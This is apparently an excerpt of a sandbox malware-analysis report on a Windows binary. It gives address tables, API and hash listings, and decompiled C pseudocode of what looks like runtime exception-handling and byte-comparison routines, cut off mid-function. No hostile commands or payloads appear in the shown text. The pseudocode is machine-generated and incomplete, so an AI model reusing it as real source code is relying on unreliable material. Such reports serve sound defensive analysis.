                                              0x00b27a82
                                              0x00b27a8b
                                              0x00b27a94
                                              0x00b27a9a
                                              0x00b27aa2
                                              0x00b27aa4
                                              0x00b27aa7
                                              0x00b27aad
                                              0x00b27e21
                                              0x00b27e21
                                              0x00b27e26
                                              0x00b27e2a
                                              0x00b27e2e
                                              0x00b27e2f
                                              0x00b27e32
                                              0x00b27e33
                                              0x00b27e34
                                              0x00b27e37
                                              0x00b27e39
                                              0x00b27e3c
                                              0x00b27e3d
                                              0x00b27e3e
                                              0x00b27e41
                                              0x00b27e46
                                              0x00b27e46
                                              0x00b27e49
                                              0x00b27e4c
                                              0x00b27e4e
                                              0x00b27e50
                                              0x00b27e50
                                              0x00b27e56
                                              0x00b27e5b
                                              0x00b27e5e
                                              0x00b27e60
                                              0x00b27e63
                                              0x00b27e66
                                              0x00b27e67
                                              0x00b27e75
                                              0x00b27e7a
                                              0x00b27e7f
                                              0x00b27e82
                                              0x00b27e85
                                              0x00b27e88
                                              0x00b27e8b
                                              0x00b27e8c
                                              0x00b27e8f
                                              0x00b27e97
                                              0x00b27e99
                                              0x00b27e9d
                                              0x00000000
                                              0x00b27e9d
                                              0x00b27ea6
                                              0x00b27abc
                                              0x00b27abc
                                              0x00b27ac5
                                              0x00b27bc2
                                              0x00b27bc2
                                              0x00b27bc5
                                              0x00000000
                                              0x00b27af4
                                              0x00b27af4
                                              0x00b27af9
                                              0x00000000
                                              0x00b27aff
                                              0x00b27aff
                                              0x00b27b07
                                              0x00b27dbf
                                              0x00b27dbf
                                              0x00b27b0d
                                              0x00b27b12
                                              0x00b27b15
                                              0x00b27b1a
                                              0x00b27b21
                                              0x00b27b26
                                              0x00000000
                                              0x00b27b5e
                                              0x00b27b66
                                              0x00b27bca
                                              0x00b27bca
                                              0x00b27bcd
                                              0x00b27bd0
                                              0x00b27bd2
                                              0x00b27bd5
                                              0x00b27bd8
                                              0x00b27bde
                                              0x00b27d8a
                                              0x00b27d8a
                                              0x00b27d8d
                                              0x00000000
                                              0x00b27d8f
                                              0x00b27d8f
                                              0x00b27d92
                                              0x00000000
                                              0x00b27d98
                                              0x00b27da8
                                              0x00b27dad
                                              0x00000000
                                              0x00b27dad
                                              0x00b27d92
                                              0x00b27be4
                                              0x00b27be4
                                              0x00b27be8
                                              0x00000000
                                              0x00b27bee
                                              0x00b27bee
                                              0x00b27bf5
                                              0x00b27c0d
                                              0x00b27c0d
                                              0x00b27c10
                                              0x00b27c13
                                              0x00b27c29
                                              0x00b27c2e
                                              0x00b27c31
                                              0x00b27c34
                                              0x00b27c37
                                              0x00b27c3a
                                              0x00b27c3d
                                              0x00b27c40
                                              0x00b27c46
                                              0x00b27c46
                                              0x00b27c49
                                              0x00b27c4c
                                              0x00b27c5b
                                              0x00b27c5c
                                              0x00b27c5c
                                              0x00b27c5e
                                              0x00b27c61
                                              0x00b27c67
                                              0x00b27c6a
                                              0x00b27c70
                                              0x00b27c72
                                              0x00b27c75
                                              0x00b27c78
                                              0x00b27c7e
                                              0x00b27c81
                                              0x00b27c86
                                              0x00b27c86
                                              0x00b27c89
                                              0x00b27c8c
                                              0x00b27c8f
                                              0x00b27c92
                                              0x00b27c95
                                              0x00b27c9a
                                              0x00b27c9b
                                              0x00b27c9c
                                              0x00b27c9d
                                              0x00b27c9e
                                              0x00b27ca1
                                              0x00b27ca4
                                              0x00b27ca6
                                              0x00000000
                                              0x00b27ca8
                                              0x00b27ca8
                                              0x00b27caf
                                              0x00b27cb4
                                              0x00b27cb7
                                              0x00b27cb9
                                              0x00000000
                                              0x00000000
                                              0x00b27cbb
                                              0x00b27cbe
                                              0x00b27cbf
                                              0x00b27cc2
                                              0x00b27cc4
                                              0x00000000
                                              0x00b27cc6
                                              0x00b27cc6
                                              0x00b27cc9
                                              0x00000000
                                              0x00b27cc9
                                              0x00000000
                                              0x00b27cc4
                                              0x00b27cdd
                                              0x00b27ce3
                                              0x00b27ce6
                                              0x00b27ce9
                                              0x00b27cec
                                              0x00b27ced
                                              0x00b27cf2
                                              0x00b27cf3
                                              0x00b27cf6
                                              0x00b27cf9
                                              0x00b27cfc
                                              0x00b27cff
                                              0x00b27d00
                                              0x00b27d05
                                              0x00b27d05
                                              0x00b27d08
                                              0x00b27d08
                                              0x00000000
                                              0x00b27ccc
                                              0x00b27ccc
                                              0x00b27ccd
                                              0x00b27cd0
                                              0x00b27cd3
                                              0x00b27cd6
                                              0x00b27cd6
                                              0x00000000
                                              0x00b27cdb
                                              0x00b27c78
                                              0x00b27c6a
                                              0x00b27d0b
                                              0x00b27d0e
                                              0x00b27d0f
                                              0x00b27d12
                                              0x00b27d15
                                              0x00b27d18
                                              0x00b27d1b
                                              0x00b27d1b
                                              0x00b27d24
                                              0x00b27d27
                                              0x00b27d27
                                              0x00b27c40
                                              0x00b27d2a
                                              0x00b27d2e
                                              0x00b27d30
                                              0x00b27d33
                                              0x00b27d39
                                              0x00b27d39
                                              0x00b27d41
                                              0x00b27d46
                                              0x00b27db0
                                              0x00b27db0
                                              0x00b27db5
                                              0x00b27db9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27d48
                                              0x00b27d4b
                                              0x00b27d4e
                                              0x00b27d52
                                              0x00b27d60
                                              0x00b27d62
                                              0x00b27d79
                                              0x00b27d7d
                                              0x00b27d83
                                              0x00b27d84
                                              0x00b27d86
                                              0x00000000
                                              0x00b27d88
                                              0x00000000
                                              0x00b27d88
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27d54
                                              0x00b27d54
                                              0x00b27d56
                                              0x00000000
                                              0x00b27d58
                                              0x00b27d58
                                              0x00b27d5c
                                              0x00000000
                                              0x00b27d5e
                                              0x00b27d64
                                              0x00b27d69
                                              0x00b27d6c
                                              0x00b27d71
                                              0x00b27d74
                                              0x00000000
                                              0x00b27d74
                                              0x00b27d5c
                                              0x00b27d56
                                              0x00b27d52
                                              0x00b27bf7
                                              0x00b27bf7
                                              0x00b27bfe
                                              0x00000000
                                              0x00b27c00
                                              0x00b27c00
                                              0x00b27c07
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b27c07
                                              0x00b27bfe
                                              0x00b27bf5
                                              0x00b27be8
                                              0x00b27b68
                                              0x00b27b70
                                              0x00b27b73
                                              0x00b27b78
                                              0x00b27b7c
                                              0x00b27b7f
                                              0x00b27b85
                                              0x00b27b88
                                              0x00000000
                                              0x00b27b8a
                                              0x00b27b8a
                                              0x00b27b8d
                                              0x00b27b8f
                                              0x00b27dc0
                                              0x00b27dc0
                                              0x00000000
                                              0x00b27b95
                                              0x00b27b9d
                                              0x00b27ba8
                                              0x00000000
                                              0x00000000
                                              0x00b27bb1
                                              0x00b27bb4
                                              0x00b27bb5
                                              0x00b27bb8
                                              0x00b27bba
                                              0x00000000
                                              0x00b27bc0
                                              0x00000000
                                              0x00b27bc0
                                              0x00000000
                                              0x00b27bba
                                              0x00b27b95
                                              0x00b27dc5
                                              0x00b27dc5
                                              0x00b27dc7
                                              0x00b27dc8
                                              0x00b27dcf
                                              0x00b27dd2
                                              0x00b27de0
                                              0x00b27de5
                                              0x00b27dea
                                              0x00b27ded
                                              0x00b27df2
                                              0x00b27df5
                                              0x00b27df8
                                              0x00b27dfa
                                              0x00b27dfc
                                              0x00b27dfc
                                              0x00b27e01
                                              0x00b27e0d
                                              0x00b27e13
                                              0x00b27e18
                                              0x00b27e1b
                                              0x00b27e1c
                                              0x00000000
                                              0x00b27e1c
                                              0x00b27b88
                                              0x00b27b66
                                              0x00b27b26
                                              0x00b27b07
                                              0x00b27af9
                                              0x00b27ac5

                                              APIs
                                              • type_info::operator==.LIBVCRUNTIME ref: 00B27BA1
                                              • ___TypeMatch.LIBVCRUNTIME ref: 00B27CAF
                                              • CatchIt.LIBVCRUNTIME ref: 00B27D00
                                              • _UnwindNestedFrames.LIBCMT ref: 00B27E01
                                              • CallUnexpected.LIBVCRUNTIME ref: 00B27E1C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 4119006552-393685449
                                              • Opcode ID: ebb400a31adb7003bdb5150fba62a52f837cabdb15d561c697f14c6e981a22cd
                                              • Instruction ID: 97b43137f7e301639c4cd33782b004d2b64bf15b0f3ea7417e2308f7a829b332
                                              • Opcode Fuzzy Hash: ebb400a31adb7003bdb5150fba62a52f837cabdb15d561c697f14c6e981a22cd
                                              • Instruction Fuzzy Hash: 76B1AD71844229DFCF15DFA4E8808AEBBF5FF18310F1045EAE8086B212DB31DA51CB99
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1AA00 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                              • String ID:
                                              • API String ID: 3590494090-0
                                              • Opcode ID: 388e12dc2a367433de6c31a46f195d493a807d502f81e8c979c13e683df7f7cc
                                              • Instruction ID: 148d87ec92aee4a9ab012c5760a78b4c8e77ab779347e1a1a60932886ffa06b6
                                              • Opcode Fuzzy Hash: 388e12dc2a367433de6c31a46f195d493a807d502f81e8c979c13e683df7f7cc
                                              • Instruction Fuzzy Hash: AA81E274A042199FCB04DFA8C588AEDBBF0FF08315F1484A9E889EB351E734E981CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1A250 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CaretFocusInvertRect$HideReleaseShow
                                              • String ID:
                                              • API String ID: 1353628544-0
                                              • Opcode ID: 01fa9d307017d2deb0d78e0cc3963e8147539135a47bc78bc5908b1c9a77ec9f
                                              • Instruction ID: b2d7c61ac96245a3a10b26f6c3230080128124e68e93ba239460d6edf08e2173
                                              • Opcode Fuzzy Hash: 01fa9d307017d2deb0d78e0cc3963e8147539135a47bc78bc5908b1c9a77ec9f
                                              • Instruction Fuzzy Hash: FF619274A00209DFCB04DF68D188AAEBBF5FF08311F5184A9E8499B351E735ED85CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B12980 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.300701212.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                              • Associated: 00000001.00000002.300683136.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300818017.0000000000B2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300845205.0000000000B34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000001.00000002.300861090.0000000000B39000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_b10000_febcldoukq.jbxd
                                              Similarity
                                              • API ID: CreateEvent
                                              • String ID:
                                              • API String ID: 2692171526-0
                                              • Opcode ID: 69d9af216d6dcc409a4ecc076f062cf83dbb5dccf0f97b01d90bb490ca8c9559
                                              • Instruction ID: d5684fcfef72fb372939385594a581dd5a49520700666b437935cc04b5fb81ee
                                              • Opcode Fuzzy Hash: 69d9af216d6dcc409a4ecc076f062cf83dbb5dccf0f97b01d90bb490ca8c9559
                                              • Instruction Fuzzy Hash: 4891C6B0908205DFDB04DFA9D4887EEBBF0FB44304F50886AE8559B390D7799599CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00B1DED0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E00B1DED0(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1359;
				void* _t1360;
				void* _t1367;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E00B2AEA1(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0xb34050;
				E00B1DE90(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0xb34050);
				E00B220D7(_a12);
				_t1005 = _a4;
				_t1360 = _t1359 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00B220C0(_t1250, 0xfffffffe, _t1347, 0xb34050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E00B22060(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1367 = _t1014;
								if(_t1367 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E00B1DE90(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1367 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0xb2c628;
											if(__eflags != 0) {
												_t1245 = E00B21EB0(__eflags, 0xb2c628);
												_t1360 = _t1360 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0xb2c628; // 0xb1dc55
													 *0xb37000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1360 = _t1360 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E00B220A0(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00B220C0(_t1017, _t1342, _t1347, 0xb34050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E00B1DE90(_t1250, _t1334, _t1342, _t1347, _v12);
										E00B22080();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(__eflags != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L529;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L529;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
																										_t1270 = (0 | _t196) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										goto L107;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t1270 = (_t1053 & 0x000000ff) - (_t1339[0x10] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t153 = _t1270 > 0;
																						__eflags = _t153;
																						_t1270 = (0 | _t153) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0x11] & 0x000000ff) - (_t1339[0x11] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t159 = _t1270 > 0;
																							__eflags = _t159;
																							_t1270 = (0 | _t159) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x12] & 0x000000ff) - (_t1339[0x12] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t165 = _t1270 > 0;
																								__eflags = _t165;
																								_t1270 = (0 | _t165) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x13] & 0x000000ff) - (_t1339[0x13] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t171 = _t1270 > 0;
																									__eflags = _t171;
																									_t1270 = (0 | _t171) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									goto L94;
																								}
																							}
																						}
																					}
																				}
																			} else {
																				_t1270 = (_t1052 & 0x000000ff) - (_t1339[0xc] & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t128 = _t1270 > 0;
																					__eflags = _t128;
																					_t1270 = (0 | _t128) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = (_t1353[0xd] & 0x000000ff) - (_t1339[0xd] & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t134 = _t1270 > 0;
																						__eflags = _t134;
																						_t1270 = (0 | _t134) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						_t1270 = (_t1353[0xe] & 0x000000ff) - (_t1339[0xe] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t140 = _t1270 > 0;
																							__eflags = _t140;
																							_t1270 = (0 | _t140) * 2 - 1;
																						}
																						__eflags = _t1270;
